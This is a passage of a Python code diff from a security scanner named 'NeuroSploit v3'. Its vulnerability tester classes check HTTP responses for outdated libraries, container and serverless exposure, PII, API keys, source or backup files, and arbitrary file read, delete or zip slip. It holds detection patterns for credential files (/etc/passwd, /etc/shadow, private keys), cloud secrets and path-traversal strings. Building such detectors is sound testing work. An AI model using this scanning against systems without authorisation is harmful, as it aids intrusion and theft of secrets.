            (r"Django[/=](?:1\.\d+|2\.[01]\.\d+|3\.0\.\d+)", "Django < 3.1 (multiple CVEs)"),
            (r"Flask[/=](?:0\.\d+|1\.[01]\.\d+)", "Flask < 2.0 (known issues)"),
            (r"requests[/=]2\.(?:[0-9]|1\d|2[0-4])\.\d+", "Requests < 2.25 (CVE-2023-32681)"),
            # Java
            (r"log4j[/-]2\.(?:[0-9]|1[0-4])\.\d+", "Log4j < 2.15 (Log4Shell CVE-2021-44228)"),
            (r"spring-core[/-](?:[1-4]\.\d+|5\.[0-2]\.\d+)", "Spring < 5.3 (Spring4Shell)"),
            (r"jackson-databind[/-]2\.(?:[0-8]|9\.[0-9])\.\d*", "Jackson < 2.9.10 (deserialization)"),
            # PHP
            (r"laravel/framework[/:]\s*v?(?:[1-7]\.\d+|8\.[0-7]\d)", "Laravel < 8.80 (known issues)"),
        ]
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for known vulnerable library version strings.

        Returns (found, confidence, evidence); Log4Shell/Spring4Shell/
        deserialization findings raise confidence to 0.9.
        """
        findings = []
        # Check response body (JS files, package.json, error pages)
        for pattern, description in self.vulnerable_libs:
            match = re.search(pattern, response_body, re.IGNORECASE)
            if match:
                findings.append(f"{match.group(0)} - {description}")
        # Check headers for version info
        headers_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items())
        for pattern, description in self.vulnerable_libs:
            match = re.search(pattern, headers_str, re.IGNORECASE)
            # Crude dedup: skip if this library was already reported from
            # the body scan above.
            if match and description not in str(findings):
                findings.append(f"{match.group(0)} - {description}")
        if findings:
            # Log4Shell and Spring4Shell are critical
            critical = any(k in f for f in findings for k in ["Log4Shell", "Spring4Shell", "deserialization"])
            confidence = 0.9 if critical else 0.75
            return True, confidence, f"Vulnerable dependency: {'; '.join(findings[:3])}"
        return False, 0.0, None
class ContainerEscapeTester(BaseTester):
    """Tester for Container Escape / Container Misconfiguration vulnerabilities.

    Looks for Docker/Kubernetes artifacts leaking into responses, exposed
    container runtime interfaces, extra Linux capabilities, and host block
    devices visible from inside a container.
    """
    def __init__(self):
        super().__init__()
        self.name = "container_escape"
        # (regex, label) fingerprints of container-environment artifacts.
        self.container_indicators = [
            # Docker
            (r"\.dockerenv", "Docker environment file accessible"),
            (r"docker\.sock", "Docker socket exposed"),
            (r"/var/run/docker\.sock", "Docker socket path"),
            # Cgroup
            (r"docker[/-][0-9a-f]{12,64}", "Docker container cgroup"),
            (r"/proc/self/cgroup.*docker", "Docker cgroup detected"),
            (r"/proc/self/cgroup.*kubepods", "Kubernetes pod cgroup"),
            # Kubernetes
            (r"KUBERNETES_SERVICE_HOST", "Kubernetes service host env"),
            (r"KUBERNETES_PORT", "Kubernetes port env"),
            (r"/var/run/secrets/kubernetes\.io", "Kubernetes secrets path"),
            (r"serviceaccount/token", "Kubernetes service account token"),
            (r"kube-system", "Kubernetes system namespace"),
            # Container runtime
            (r"containerd", "containerd runtime"),
            (r"runc", "runc runtime"),
            # Process namespace
            (r"process\s+1\b.*(?:init|systemd|tini|dumb-init)", "Container init process"),
        ]
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for Docker/container indicators in response.

        Returns (found, confidence, evidence); socket/secrets/token exposure
        raises confidence to 0.9.
        """
        findings = []
        for pattern, description in self.container_indicators:
            if re.search(pattern, response_body, re.IGNORECASE):
                findings.append(description)
        if findings:
            # Docker socket or K8s secrets are critical
            critical = any(k in f for f in findings for k in ["socket", "secrets", "token"])
            confidence = 0.9 if critical else 0.7
            return True, confidence, f"Container exposure: {', '.join(findings[:3])}"
        # Privileged container detection — only when the caller marked this
        # request as a capability probe.
        if context.get("is_capability_check"):
            # Capabilities beyond the default container set suggest a
            # privileged / overly-capable container.
            cap_patterns = [
                r"cap_sys_admin", r"cap_sys_ptrace", r"cap_net_admin",
                r"cap_dac_override", r"cap_sys_rawio",
            ]
            for pattern in cap_patterns:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.8, f"Privileged container: {pattern} capability detected"
        # Host block devices (sda/xvda/nvme) visible from the container.
        if re.search(r"/dev/(?:sda|xvda|nvme)\d*\s", response_body):
            return True, 0.6, "Host block devices visible from container"
        return False, 0.0, None
class ServerlessMisconfigTester(BaseTester):
    """Tester for Serverless Misconfiguration vulnerabilities.

    Detects leaked serverless runtime environment variables (AWS Lambda,
    Google Cloud Functions, Azure Functions), exposed function source code,
    and overly detailed invocation errors.
    """
    def __init__(self):
        super().__init__()
        self.name = "serverless_misconfig"
        # (regex, label) pairs; group 1, when present, captures the leaked
        # value so it can be shown (or redacted) in the evidence string.
        self.env_patterns = [
            # AWS Lambda
            (r"AWS_LAMBDA_FUNCTION_NAME\s*[=:]\s*(\S+)", "Lambda function name"),
            (r"AWS_SECRET_ACCESS_KEY\s*[=:]\s*(\S+)", "Lambda AWS secret key"),
            (r"AWS_SESSION_TOKEN\s*[=:]\s*(\S+)", "Lambda session token"),
            (r"AWS_LAMBDA_LOG_GROUP_NAME", "Lambda log group"),
            (r"_HANDLER\s*[=:]\s*(\S+)", "Lambda handler path"),
            (r"LAMBDA_TASK_ROOT\s*[=:]\s*(\S+)", "Lambda task root"),
            (r"AWS_EXECUTION_ENV\s*[=:]\s*(\S+)", "Lambda execution environment"),
            # Google Cloud Functions
            (r"FUNCTION_NAME\s*[=:]\s*(\S+)", "Cloud Function name"),
            (r"GCLOUD_PROJECT\s*[=:]\s*(\S+)", "GCP project ID"),
            (r"GOOGLE_CLOUD_PROJECT\s*[=:]\s*(\S+)", "GCP project"),
            (r"GCP_PROJECT\s*[=:]\s*(\S+)", "GCP project"),
            (r"FUNCTION_REGION\s*[=:]\s*(\S+)", "Cloud Function region"),
            # Azure Functions
            (r"FUNCTIONS_WORKER_RUNTIME\s*[=:]\s*(\S+)", "Azure Function runtime"),
            (r"AzureWebJobsStorage\s*[=:]\s*(\S+)", "Azure storage connection string"),
            (r"WEBSITE_SITE_NAME\s*[=:]\s*(\S+)", "Azure site name"),
        ]
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for serverless environment variable exposure.

        Returns (found, confidence, evidence); leaked credentials raise the
        confidence to 0.95. Secret-like values are redacted in the evidence.
        """
        findings = []
        for pattern, description in self.env_patterns:
            match = re.search(pattern, response_body)
            if match:
                # Some patterns (e.g. log group) have no capture group.
                value = match.group(1) if match.lastindex else ""
                # Redact sensitive values so the finding itself doesn't leak.
                if "key" in description.lower() or "token" in description.lower() or "secret" in description.lower():
                    display = f"{description} (REDACTED)"
                else:
                    display = f"{description}: {value[:30]}"
                findings.append(display)
        if findings:
            # Credentials are critical
            critical = any(k in f for f in findings for k in ["secret", "token", "REDACTED"])
            confidence = 0.95 if critical else 0.75
            return True, confidence, f"Serverless misconfiguration: {', '.join(findings[:3])}"
        # Function source code exposure — only when the caller marked this
        # request as a source-retrieval probe.
        if context.get("is_source_request"):
            source_indicators = [
                r"exports\.handler\s*=", r"def lambda_handler\(",
                r"def main\(req:", r"module\.exports",
                r"def hello_http\(request\):",
            ]
            for pattern in source_indicators:
                if re.search(pattern, response_body):
                    return True, 0.8, "Serverless misconfiguration: function source code exposed"
        # Invocation error details (stack traces, runtime error objects).
        error_patterns = [
            r"\"errorType\"\s*:\s*\"(\w+)\"",
            r"\"stackTrace\"\s*:\s*\[",
            r"Runtime\.HandlerNotFound",
            r"\"errorMessage\"\s*:\s*\".*(?:import|require|module)",
        ]
        for pattern in error_patterns:
            match = re.search(pattern, response_body)
            if match:
                return True, 0.7, f"Serverless misconfiguration: detailed error exposed ({match.group(0)[:60]})"
        return False, 0.0, None
@@ -0,0 +1,388 @@
"""
NeuroSploit v3 - Data Exposure Vulnerability Testers
Testers for sensitive data exposure, information disclosure, API key exposure,
source code disclosure, backup file exposure, and version disclosure.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class SensitiveDataExposureTester(BaseTester):
    """Tester for Sensitive Data Exposure (PII leakage).

    Scans successful responses for PII and secret-material patterns (cards,
    SSNs, private keys, password hashes, bulk emails/phones).
    """

    def __init__(self):
        super().__init__()
        self.name = "sensitive_data_exposure"
        # (regex, label) pairs matched against the response body.
        self.pii_patterns = [
            # SSN (US)
            (r"\b\d{3}-\d{2}-\d{4}\b", "SSN pattern"),
            # Credit card numbers (Visa, MC, Amex, Discover)
            (r"\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "Visa card number"),
            (r"\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "MasterCard number"),
            (r"\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b", "Amex card number"),
            (r"\b6(?:011|5\d{2})[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "Discover card number"),
            # Email addresses in bulk (5+ treated as a data leak; see below)
            (r"[\w.+-]+@[\w-]+\.[\w.-]+", "email address"),
            # Phone numbers (US format)
            (r"\b\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b", "phone number"),
            # Passport numbers
            (r"\b[A-Z]\d{8}\b", "passport number pattern"),
            # Private keys
            (r"-----BEGIN (?:RSA |EC |DSA )?PRIVATE KEY-----", "private key"),
            # Password hashes
            (r"\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}", "bcrypt hash"),
            (r"\b[a-f0-9]{32}\b", "MD5 hash"),
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for PII patterns in response.

        Returns (found, confidence, evidence). Matched PII is redacted in the
        evidence string: previously the first 20 characters of the match were
        embedded, which reproduced entire card/SSN values in reports.
        """
        # Error responses are not considered exposures.
        if response_status >= 400:
            return False, 0.0, None
        findings = []
        for pattern, description in self.pii_patterns:
            matches = re.findall(pattern, response_body)
            if not matches:
                continue
            # Private keys and password hashes are always significant.
            if "private key" in description:
                return True, 0.95, f"Sensitive data exposure: {description} found in response"
            if "bcrypt hash" in description:
                return True, 0.9, f"Sensitive data exposure: {description} found in response"
            # Emails/phones only count in bulk (5+); MD5-like strings in 3+.
            if description in ["email address", "phone number"]:
                if len(matches) >= 5:
                    findings.append(f"{len(matches)} {description}s")
            elif description == "MD5 hash":
                if len(matches) >= 3:
                    findings.append(f"{len(matches)} {description}es")
            else:
                # Redact: report only a 4-character prefix so the finding
                # itself does not leak the PII (e.g. full card numbers).
                sample = matches[0] if isinstance(matches[0], str) else matches[0][0]
                findings.append(f"{description} ({sample[:4]}...)")
        if findings:
            confidence = min(0.9, 0.6 + 0.1 * len(findings))
            return True, confidence, f"Sensitive data exposure: {', '.join(findings[:3])}"
        return False, 0.0, None
class InformationDisclosureTester(BaseTester):
    """Tester for Information Disclosure vulnerabilities.

    Scans response headers for version/technology banners and response
    bodies for paths, stack traces, debug flags, and internal IPs.
    """
    def __init__(self):
        super().__init__()
        self.name = "information_disclosure"
        # (regex, location, label) triples applied to the flattened headers.
        # NOTE(review): the middle "location" element is never read by
        # analyze_response — it only unpacks and ignores it.
        self.disclosure_patterns = [
            # Server version headers
            (r"Server:\s*(.+)", "header", "Server version"),
            (r"X-Powered-By:\s*(.+)", "header", "Technology stack"),
            (r"X-AspNet-Version:\s*(.+)", "header", "ASP.NET version"),
            (r"X-AspNetMvc-Version:\s*(.+)", "header", "ASP.NET MVC version"),
        ]
        # (regex, label) pairs applied to the response body.
        self.body_patterns = [
            # Path disclosure
            (r"(?:/var/www|/home/\w+|/srv/|/opt/\w+|C:\\inetpub|C:\\Users\\\w+)[/\\]\S+", "Internal path"),
            # Stack traces
            (r"Traceback \(most recent call last\)", "Python stack trace"),
            (r"at \w+\.\w+\([\w.]+:\d+\)", "Java stack trace"),
            (r"(?:Fatal error|Warning|Notice):\s+.*\sin\s+/\S+\s+on line \d+", "PHP error with path"),
            (r"Microsoft \.NET Framework Version:\d+", ".NET framework version"),
            # Database info
            (r"(?:MySQL|PostgreSQL|Oracle|MSSQL)\s+\d+\.\d+", "Database version"),
            # Debug info
            (r"(?:DEBUG|TRACE)\s*=\s*(?:true|True|1)", "Debug mode enabled"),
            (r"(?:SECRET_KEY|DB_PASSWORD|API_SECRET)\s*[=:]\s*\S+", "Secret in debug output"),
            # Internal IPs
            (r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})\b", "Internal IP address"),
        ]
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for information disclosure in headers and body.

        Returns (found, confidence, evidence); stack traces, secrets, or
        debug output raise the confidence to 0.85.
        """
        findings = []
        # Check headers (flattened into "Name: value" lines for regexes).
        headers_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items())
        for pattern, location, description in self.disclosure_patterns:
            match = re.search(pattern, headers_str, re.IGNORECASE)
            if match:
                findings.append(f"{description}: {match.group(1)[:50]}")
        # Check body
        for pattern, description in self.body_patterns:
            match = re.search(pattern, response_body, re.IGNORECASE)
            if match:
                findings.append(f"{description}: {match.group(0)[:80]}")
        if findings:
            # Stack traces and secrets are higher severity
            high_severity = any("stack trace" in f.lower() or "secret" in f.lower() or "debug" in f.lower() for f in findings)
            confidence = 0.85 if high_severity else 0.7
            return True, confidence, f"Information disclosure: {'; '.join(findings[:3])}"
        return False, 0.0, None
class ApiKeyExposureTester(BaseTester):
    """Tester for API Key Exposure vulnerabilities.

    Scans responses for well-known API-key/token formats and reports them
    with the matched value redacted.
    """

    def __init__(self):
        super().__init__()
        self.name = "api_key_exposure"
        # (regex, label) pairs; a pattern may contain capture groups, in
        # which case re.findall returns the captured part(s).
        self.key_patterns = [
            # AWS
            (r"AKIA[0-9A-Z]{16}", "AWS Access Key"),
            (r"(?:aws_secret_access_key|AWS_SECRET_ACCESS_KEY)\s*[=:]\s*[A-Za-z0-9/+=]{40}", "AWS Secret Key"),
            # Google
            (r"AIza[0-9A-Za-z\-_]{35}", "Google API Key"),
            (r"ya29\.[0-9A-Za-z\-_]+", "Google OAuth Token"),
            # Stripe
            (r"sk_live_[0-9a-zA-Z]{24,}", "Stripe Secret Key"),
            (r"pk_live_[0-9a-zA-Z]{24,}", "Stripe Publishable Key"),
            (r"rk_live_[0-9a-zA-Z]{24,}", "Stripe Restricted Key"),
            # GitHub
            (r"gh[pousr]_[A-Za-z0-9_]{36,}", "GitHub Token"),
            # Slack
            (r"xox[baprs]-[0-9]{10,13}-[0-9]{10,13}[a-zA-Z0-9-]*", "Slack Token"),
            # Twilio
            (r"SK[0-9a-fA-F]{32}", "Twilio API Key"),
            # SendGrid
            (r"SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43}", "SendGrid API Key"),
            # Heroku
            (r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}", "Heroku API Key / UUID"),
            # Generic patterns
            (r"(?:api[_-]?key|apikey|api[_-]?secret)\s*[=:]\s*['\"]?([A-Za-z0-9_\-]{20,})['\"]?", "Generic API Key"),
            (r"(?:access[_-]?token|auth[_-]?token)\s*[=:]\s*['\"]?([A-Za-z0-9_\-.]{20,})['\"]?", "Access Token"),
            # Bearer tokens in JS
            (r"['\"]Bearer\s+[A-Za-z0-9_\-\.]{20,}['\"]", "Hardcoded Bearer Token"),
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for API key patterns in response.

        Returns (found, confidence, evidence); AWS/Stripe secret keys raise
        the confidence to 0.95. Matched keys are redacted in the evidence.
        """
        findings = []
        for pattern, description in self.key_patterns:
            # Skip bare UUIDs entirely (far too many false positives) —
            # hoisted before the scan so we don't pay for a useless findall.
            if "UUID" in description:
                continue
            matches = re.findall(pattern, response_body)
            if not matches:
                continue
            # re.findall returns tuples when a pattern has multiple capture
            # groups; take the first group so redaction always gets a str.
            # (The previous ternary's else-branch returned the tuple as-is,
            # which would have broken the slicing below.)
            sample = matches[0] if isinstance(matches[0], str) else matches[0][0]
            # Redact the actual key in the evidence string.
            redacted = sample[:8] + "..." + sample[-4:] if len(sample) > 12 else sample[:4] + "..."
            findings.append(f"{description} ({redacted})")
        if findings:
            # AWS/Stripe secret keys are critical
            critical = any(k in f for f in findings for k in ["AWS Secret", "Stripe Secret", "Secret Key"])
            confidence = 0.95 if critical else 0.85
            return True, confidence, f"API key exposure: {', '.join(findings[:3])}"
        return False, 0.0, None
class SourceCodeDisclosureTester(BaseTester):
    """Tester for Source Code Disclosure vulnerabilities.

    Detects server-side source, repository metadata, source maps, and
    environment files leaking into successful responses.
    """

    def __init__(self):
        super().__init__()
        self.name = "source_code_disclosure"
        # (regex, label) fingerprints of disclosed source material.
        self.source_indicators = [
            # Git
            (r"\[core\]\s*\n\s*repositoryformatversion", "Git config exposed"),
            (r"\[remote \"origin\"\]", "Git config with remote"),
            (r"ref: refs/heads/", "Git HEAD reference exposed"),
            # Source maps
            (r"\"version\"\s*:\s*3,\s*\"sources\"", "JavaScript source map"),
            (r"//[#@]\s*sourceMappingURL=", "Source map reference"),
            # PHP source
            (r"<\?php\s", "PHP source code"),
            (r"<\?=", "PHP short tag source"),
            # Python source
            (r"^(?:import |from \w+ import |def \w+\(|class \w+)", "Python source code"),
            # Java/JSP
            (r"<%@?\s*page\s+", "JSP source code"),
            (r"package\s+\w+\.\w+;", "Java package declaration"),
            # Environment files
            (r"(?:DB_PASSWORD|SECRET_KEY|DATABASE_URL)\s*=\s*\S+", "Environment file content"),
            # Composer/package files with private repos
            (r"\"require\".*\"private/", "Private package reference"),
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for source code indicators in response.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status >= 400:
            return False, 0.0, None
        for pattern, description in self.source_indicators:
            if not re.search(pattern, response_body, re.MULTILINE):
                continue
            # Confidence depends on what leaked: repo metadata and env files
            # are near-certain; source maps are often shipped intentionally.
            if "Git" in description or "Environment" in description:
                score = 0.95
            elif "source map" in description.lower():
                score = 0.6
            else:
                score = 0.8
            return True, score, f"Source code disclosure: {description}"
        # A 200 with a non-trivial body for a well-known source/config path.
        sensitive_files = [".git/config", ".env", ".htaccess", "web.config",
                           "wp-config.php", "config.php", "settings.py"]
        for filename in sensitive_files:
            if filename in payload and response_status == 200 and len(response_body) > 50:
                return True, 0.7, f"Source code disclosure: {filename} accessible"
        return False, 0.0, None
class BackupFileExposureTester(BaseTester):
    """Tester for Backup File Exposure vulnerabilities.

    Detects served backup artifacts either by content signature (SQL
    dumps, archives, web-server config) or by a backup-style extension
    in the request that came back with substantial content.
    """

    def __init__(self):
        super().__init__()
        self.name = "backup_file_exposure"
        # Content fingerprints of common backup formats.
        self.file_signatures = [
            # SQL dumps
            (r"-- MySQL dump \d+", "MySQL database dump"),
            (r"-- PostgreSQL database dump", "PostgreSQL database dump"),
            (r"CREATE TABLE\s+[`\"]\w+[`\"]", "SQL DDL statements"),
            (r"INSERT INTO\s+[`\"]\w+[`\"]", "SQL data dump"),
            # Archive signatures (in text responses)
            (r"PK\x03\x04", "ZIP archive"),
            # Tar
            (r"ustar\s", "TAR archive"),
            # Config backups
            (r"<\?xml.*<configuration>", "XML configuration backup"),
            (r"server\s*\{[^}]*listen\s+\d+", "Nginx config backup"),
            (r"<VirtualHost\s+", "Apache config backup"),
        ]
        # Extensions suggesting a backup/working copy was requested.
        self.backup_extensions = [
            ".bak", ".backup", ".old", ".orig", ".save",
            ".swp", ".swo", ".tmp", ".temp", ".copy",
            "~", ".sql", ".tar.gz", ".zip", ".dump",
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (found, confidence, detail) for backup-file content."""
        if response_status >= 400:
            return False, 0.0, None
        # 1) Content-based detection.
        for signature, description in self.file_signatures:
            if re.search(signature, response_body, re.IGNORECASE):
                return True, 0.9, f"Backup file exposure: {description} detected"
        # 2) Extension-based detection on successful, non-trivial replies.
        if response_status != 200 or len(response_body) <= 100:
            return False, 0.0, None
        lowered_headers = {name.lower(): val for name, val in response_headers.items()}
        content_type = lowered_headers.get("content-type", "").lower()
        for ext in self.backup_extensions:
            if ext not in payload:
                continue
            # Non-HTML responses to backup file requests are suspicious.
            if "text/html" not in content_type:
                return True, 0.75, f"Backup file exposure: {ext} file served ({content_type})"
            # HTML response but contains code-like content.
            if re.search(r"(?:function |class |import |require\(|define\()", response_body):
                return True, 0.7, f"Backup file exposure: {ext} file contains source code"
        return False, 0.0, None
class VersionDisclosureTester(BaseTester):
    """Tester for Version Disclosure mapping to known CVEs.

    Scans the headers plus body for version banners of software with
    known critical CVEs, falling back to flagging any versioned Server
    header as a low-confidence information leak.
    """

    def __init__(self):
        super().__init__()
        self.name = "version_disclosure"
        # Software versions with known critical CVEs
        self.vulnerable_versions = {
            r"Apache/2\.4\.49\b": "CVE-2021-41773 (path traversal)",
            r"Apache/2\.4\.50\b": "CVE-2021-42013 (path traversal bypass)",
            r"nginx/1\.(?:[0-9]|1[0-7])\.\d+": "Potential nginx < 1.18 vulnerabilities",
            r"PHP/(?:5\.\d|7\.[0-3])\.\d+": "Outdated PHP version with known CVEs",
            r"OpenSSL/1\.0\.\d": "OpenSSL 1.0.x - multiple known CVEs",
            r"jQuery/(?:1\.\d|2\.\d|3\.[0-4])\.\d+": "jQuery < 3.5 - XSS via htmlPrefilter",
            r"WordPress/(?:[1-4]\.\d|5\.[0-7])": "Outdated WordPress version",
            r"Drupal/(?:[1-7]\.\d|8\.[0-5])": "Outdated Drupal version",
            r"Rails/(?:[1-4]\.\d|5\.[01])": "Outdated Rails version",
            r"Spring Framework/(?:[1-4]\.\d|5\.[0-2])": "Outdated Spring version",
            r"Express/(?:[1-3]\.\d|4\.(?:1[0-6]))": "Outdated Express.js version",
            r"Django/(?:1\.\d|2\.[01]|3\.0)": "Outdated Django version",
            r"Log4j.(?:2\.(?:0|1[0-4])\.\d)": "CVE-2021-44228 (Log4Shell)",
            r"Tomcat/(?:[1-8]\.\d|9\.[0-3]\d\.\d)": "Potentially outdated Tomcat",
            r"IIS/(?:[1-9]\.0|10\.0)": "IIS version disclosure",
        }

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (found, confidence, detail) for version leakage."""
        # Scan headers and body as a single text blob.
        header_lines = [f"{name}: {val}" for name, val in response_headers.items()]
        haystack = "\n".join(header_lines) + "\n" + response_body
        findings = []
        for pattern, cve_info in self.vulnerable_versions.items():
            hit = re.search(pattern, haystack, re.IGNORECASE)
            if hit is not None:
                findings.append(f"{hit.group(0)} - {cve_info}")
        if findings:
            # A concrete CVE reference scores higher than a generic
            # "outdated" match.
            confidence = 0.9 if any("CVE-" in f for f in findings) else 0.7
            return True, confidence, f"Version disclosure: {'; '.join(findings[:3])}"
        # Generic version number leaked via the Server header.
        server_banner = {name.lower(): val for name, val in response_headers.items()}.get("server", "")
        if re.search(r"/\d+\.\d+", server_banner):
            return True, 0.5, f"Version disclosure in Server header: {server_banner}"
        return False, 0.0, None
@@ -201,3 +201,156 @@ class FileUploadTester(BaseTester):
return True, 0.8, "Executable file path returned - possible RCE"
return False, 0.0, None
class ArbitraryFileReadTester(BaseTester):
    """Tester for Arbitrary File Read vulnerabilities.

    Confirms file-read primitives by matching the response body against
    fingerprints of well-known sensitive files (/etc/passwd, .env,
    private keys, ...), including base64-encoded variants.
    """

    def __init__(self):
        super().__init__()
        self.name = "arbitrary_file_read"
        self.sensitive_file_patterns = {
            # /etc/passwd format
            r"root:.*:0:0:": "/etc/passwd",
            r"daemon:.*:\d+:\d+:": "/etc/passwd",
            r"nobody:.*:\d+:\d+:": "/etc/passwd",
            # .env file patterns
            r"(?:DB_PASSWORD|DATABASE_URL|SECRET_KEY|API_KEY|APP_SECRET)\s*=": ".env file",
            r"(?:AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=": ".env file (AWS credentials)",
            # SSH key headers
            r"-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----": "SSH/TLS private key",
            r"-----BEGIN CERTIFICATE-----": "TLS certificate",
            # Shadow file
            r"root:\$[0-9a-z]+\$": "/etc/shadow",
            # Config files
            r"<\?php.*\$db": "PHP config with DB credentials",
        }

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for sensitive file contents in response.

        Returns (found, confidence, detail).
        """
        for pattern, file_desc in self.sensitive_file_patterns.items():
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.95, f"Arbitrary file read confirmed: {file_desc} content detected"
        # Some targets return file contents base64-encoded: decode the
        # first few long base64-looking runs and re-check.
        import base64  # hoisted out of the loop (was re-imported per candidate)
        candidates = re.findall(r'[A-Za-z0-9+/]{40,}={0,2}', response_body)
        for candidate in candidates[:5]:  # Check first 5 matches
            try:
                decoded = base64.b64decode(candidate).decode('utf-8', errors='ignore')
            except Exception:
                continue  # not valid base64 - best-effort, skip
            if re.search(r"root:.*:0:0:", decoded) or re.search(r"-----BEGIN.*PRIVATE KEY-----", decoded):
                return True, 0.9, "Arbitrary file read: Base64-encoded sensitive file content"
        return False, 0.0, None
class ArbitraryFileDeleteTester(BaseTester):
    """Tester for Arbitrary File Delete vulnerabilities."""

    def __init__(self):
        super().__init__()
        self.name = "arbitrary_file_delete"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for successful file deletion indicators.

        Signals, strongest first:
        1. explicit deletion-success text/JSON in the body,
        2. 204/200 responses to a path-traversal delete payload,
        3. a follow-up 404 recorded in context (file really gone).

        Returns (found, confidence, detail).

        Note: an unused ``body_lower`` local was removed; all body
        matching below is done case-insensitively via regex flags.
        """
        # Check for explicit deletion success messages
        delete_success_patterns = [
            r"file\s+(?:has been\s+)?(?:deleted|removed)\s+successfully",
            r"(?:deleted|removed)\s+successfully",
            r'"success"\s*:\s*true.*(?:delet|remov)',
            r'"status"\s*:\s*"(?:deleted|removed)"',
            r'"message"\s*:\s*".*(?:deleted|removed).*"',
        ]
        for pattern in delete_success_patterns:
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.85, "Arbitrary file delete: Deletion success confirmed in response"
        # Check for 200/204 on DELETE request with traversal path
        traversal_indicators = ["../", "..\\", "%2e%2e", "..%2f", "..%5c"]
        if any(t in payload.lower() for t in traversal_indicators):
            if response_status == 204:
                return True, 0.8, "Arbitrary file delete: 204 No Content after path traversal delete"
            if response_status == 200:
                return True, 0.7, "Arbitrary file delete: 200 OK after path traversal delete request"
        # Check for file-not-found on subsequent access (context-based)
        if context.get("follow_up_status") == 404:
            return True, 0.85, "Arbitrary file delete: File not found after deletion request"
        return False, 0.0, None
class ZipSlipTester(BaseTester):
    """Tester for Zip Slip (path traversal in archive extraction).

    Looks for evidence that traversal sequences inside an uploaded
    archive were accepted, extracted, or wrote files outside the
    intended extraction directory.
    """

    def __init__(self):
        super().__init__()
        self.name = "zip_slip"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for path traversal in archive extraction.

        Returns (found, confidence, detail).

        Note: an unused ``body_lower`` local was removed; all body
        matching below is done case-insensitively via regex flags.
        """
        # 1) Traversal sequence echoed back in a successful response.
        traversal_patterns = [
            r"\.\./\.\./\.\./",
            r"\.\.\\\.\.\\\.\.\\",
            r"%2e%2e%2f",
            r"%2e%2e/",
        ]
        for pattern in traversal_patterns:
            if re.search(pattern, response_body, re.IGNORECASE):
                # Traversal path echoed in response
                if response_status in [200, 201]:
                    return True, 0.8, "Zip Slip: Path traversal sequence accepted in archive extraction"
        # 2) Extraction reported successful for an archive that
        #    contained traversal paths.
        if response_status in [200, 201]:
            extraction_success = [
                r"extract(?:ed|ion)\s+(?:successful|complete)",
                r"(?:file|archive)\s+(?:uploaded|processed)\s+successfully",
                r'"extracted"\s*:\s*true',
                r'"files"\s*:\s*\[.*\.\./.*\]',
            ]
            for pattern in extraction_success:
                if re.search(pattern, response_body, re.IGNORECASE):
                    if any(t in payload for t in ["../", "..\\", "%2e%2e"]):
                        return True, 0.85, "Zip Slip: Archive with traversal paths extracted successfully"
        # 3) Server admits writing/overwriting outside the target dir.
        overwrite_indicators = [
            r"(?:overwr(?:ote|itten)|replaced)\s+.*(?:/etc/|/var/|/tmp/|C:\\)",
            r"(?:created|wrote)\s+.*\.\./",
        ]
        for pattern in overwrite_indicators:
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.9, "Zip Slip: File written outside extraction directory"
        return False, 0.0, None
@@ -150,3 +150,360 @@ class HTTPMethodsTester(BaseTester):
